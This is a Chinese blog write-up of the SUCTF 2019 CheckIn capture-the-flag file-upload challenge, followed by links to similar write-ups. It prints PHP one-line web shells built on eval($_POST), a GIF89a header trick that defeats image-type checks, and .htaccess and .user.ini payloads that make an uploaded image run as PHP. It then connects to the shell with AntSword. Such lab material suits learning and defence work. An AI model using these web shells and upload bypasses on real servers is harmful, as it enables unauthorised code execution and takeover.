[SUCTF 2019]CheckIn (.htaccess和.user.ini)

已于 2022-08-09 22:20:23 修改
阅读量578 收藏
点赞数
分类专栏: 文件上传 文章标签: php apache 开发语言
于 2022-08-09 22:15:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55675216/article/details/126256401
版权

evil.php

<?php eval($_POST['evil'])?>

在这里插入图片描述
抓包修改Content-Type: image/jpeg
仍然是后缀名不合法

更改后缀名为php3、php4、phtml等都不行
将后缀名改成jpg(虽然绕过了,但是解析不了,所以没啥用)
在这里插入图片描述
换一个一句话木马

<script language="php">eval($_POST['evil'])</script>

在这里插入图片描述
进行了文件头的校验

GIF89a? <script language="php">eval($_POST['evil'])</script>

一般都是直接用这个就行了
在这里插入图片描述
成功了,但是无法解析

尝试.htaccess和.user.ini

.htaccess

<FilesMatch "evil.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

需要加个文件头绕过
GIF89a? 
<FilesMatch "evil.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

意思是如果文件中有一个evil.jpg的文件,他就会被解析为.php
在这里插入图片描述
上传成功

访问evil.jpg即
http://ec60414d-2ab8-462c-bb74-bc60f6a5597a.node4.buuoj.cn:81/uploads/uploads/c47b21fcf8f0bc8b3920541abd8024fd/evil.jpg

然后尝试使用antsword连接,但是发现连不上,不太确定哪里出了问题

尝试.user.ini

auto_prepend_file和auto_append_file
他们的作用就是指定一个文件(1.jpg),那么该文件就会被包含在要执行的php文件中(index.php)

.user.ini

GIF89a?
auto_prepend_file=evil.jpg

在这里插入图片描述
上传成功

但不知道什么原因(可能是时间限制,自动删除了),我们刚才上传的evil.jpg不在了,重新上传一下即可

然后访问http://ec60414d-2ab8-462c-bb74-bc60f6a5597a.node4.buuoj.cn:81/uploads/c47b21fcf8f0bc8b3920541abd8024fd/index.php
用antsword连接即可

开心星人
关注
专栏目录
[SUCTF 2019]CheckIn 1(详解)
qq_52843575的博客
12-12 6393
1.基础检测 进入页面是一个简单文件上传界面,正常上传文件,发现上传空内容的jpg文件显示(exif_imagetype:not image!),可知有内容检测,上传代码文件也发现后缀名过滤 开始抓包操作,因为后缀名验证,伪造文件属性也失效了,与此同时发现“?”被过滤了简单利用 2.解题关键 这道题解题关键在于怎样突破后缀名绕过,就得利用.user.ini文件留后门了 user.ini留后门原理 简单来说,就是利于.user.ini指定文件,在其当前目录下的文件执行时会将你指定的文件中的代码执行出
SUCTF web CheckIn
weixin_42499640的博客
08-19 2754
记录一道SUCTF的web1 据菠萝师傅说这是他们出的签到题 我tcl
[SUCTF 2019]CheckIn
m0_62092622的博客
04-13 1859
这道题是文件上传的题,先上传了一个PHP文件提示不合法的后缀 然后上传了一个.htaccess文件,提示exif_imagetype:not image! exif_imagetype() 读取一个图像的第一个字节并检查其签名,返回内容有16个,根据返回的值,来判断我们图片类型是什么 所以我们可以用GIF89a来绕过这个函数的检查 另外还要了解一个东西.user.ini,可以参考.user.ini文件构成的PHP后门 - phith0n .user.ini实际上就是一个可以由用户“自
buuctf web 13、[SUCTF 2019]CheckIn
m0_46412682的博客
07-16 1110
buuctf web 13、[SUCTF 2019]CheckIn 开始的页面 1、 先上传一个正常的照片 2、再上传一个php文件,提示illegal suffix 3、上传一个只含一句话木马的后缀为gif的文件,提示内容中有<? 既然过滤了<? ,所以用 4、上传7.gif,但是提示不是gif类型,exif_imagetype是文件内容的头部看是否是对应的照片类型 我们只需要再文件中填写对应的照片头部 上传成功 5、但是要怎么样才能让照片木马执行,我们想到.htaccess
BUUCTF [SUCTF 2019]CheckIn
qq_42158602的博客
02-07 1634
拿到题进行简单的测试,发现修改content-type和利用特殊扩展名php5、pht等都没有成功 发现添加图片头文件就可以绕过 GIF89a 上传php文件的时候发现过滤了<? 绕过检测 <script language='php'></script> 构造图片马 GIF89a <script language='php'>eval($_GET['...
SUCTF2019部分Web writeup
Sea_Sand息禅
11-27 1112
Easysql(堆叠注入) 2019强网杯有一道也是用的堆叠注入,这个也是,但是过滤的很严 1;show databases; 1;show tables; 这两个可以正常执行,拿到table名为Flag。 无论输入什么数字,最后返回的都是1,说明后台有所处理,输入0的话无返回结果。 from、or等都被过滤了 post方式传递,得到输入,然后执行语句,需要对后台sql语句进行猜解 从数字返回1来...
ctfshow web13 文件上传.user.ini
m0_46412682的博客
07-16 2139
ctfshow web13 文件上传 开始的页面 先上传一张正常的照片,显示error file size,这张图片是886k,再上传一张小的照片还是error file size 不管先,上传一句话木马1.php,提示错误,应该是过滤了后缀名 现在上传1.txt,内容为<?php eval($_GET[‘w’]);?>,还是文件大小问题 内容改小一点<?php eval($_GET[w]); 这里我们实现能不能上传.htaccess文件,这里是上传不了 之前再buuctf中有道也是文件
SUCTF 2019]CheckIn
shannidawang的博客
07-26 230
可恶啊 今天差点没做题 先随便上传一个 提示文件要图片 改一下后缀名 文件内容为: GIF89a <script language="php">eval($_POST['shell']);</script> 然后我们构造一个.user.ini文件 GIF89a auto_prepend_file=test.jpg 把这个也上传 连接蚁剑 连接的url要加上dir这段 http://4e81767b-49fa-4900-ae74-e1d5e68039ab.node4.buuo
[SUCTF 2019]CheckIn(文件上传)
记录学习,一起进步
03-27 586
[SUCTF 2019]CheckIn(文件上传)
web:[SUCTF 2019]CheckIn(一句话木马,.user.ini
最新发布
sleepywin的博客
12-06 254
换一种写法,需要加上GIF89a,进行exif_imagetype绕过。这里用.user.ini或者用post传参system('cat/flag')上传了一个文本,显示失败,不是图片。上传文件,随便上传一个文件试试。.user.ini内容为。那就换图片马上传试试。
BUUCTF_[SUCTF 2019]CheckIn
TenG的博客
05-22 1199
前言 问君能有几多愁?恰似一江春水向东流 先扯些题外话,这个题目是在BUUCTF刷到的,本来以为就是普通的文件上传,但是看了其他师傅的文章以后发现了新姿势,这次利用到的知识点也刷新了我对文件上传类题目的认知,所以特此记录一下。本文也参考了这位大师傅的文章,然后再结合我自己的理解记录下来,当然我的理解还不够透彻,所以还请各位师傅多多指教。 正文 先来看下题目页面 可以看到这就是普通的文件上传页面,开始呢我也是用的以前的常规方法去试的,什么修改MIME类型、图片合成马、00截断啊都试了,但是没有一个能用的。
ItemRevision.checkin()怎么使用
08-11
1. 执行ItemRevision.checkin()方法之前,确保项目的所有修改都已保存和提交,并且已经进行了必要的测试和验证。 2. 调用ItemRevision.checkin()方法,并传入需要提交的文件或版本的相关信息,例如作者、提交时间和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

开心星人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值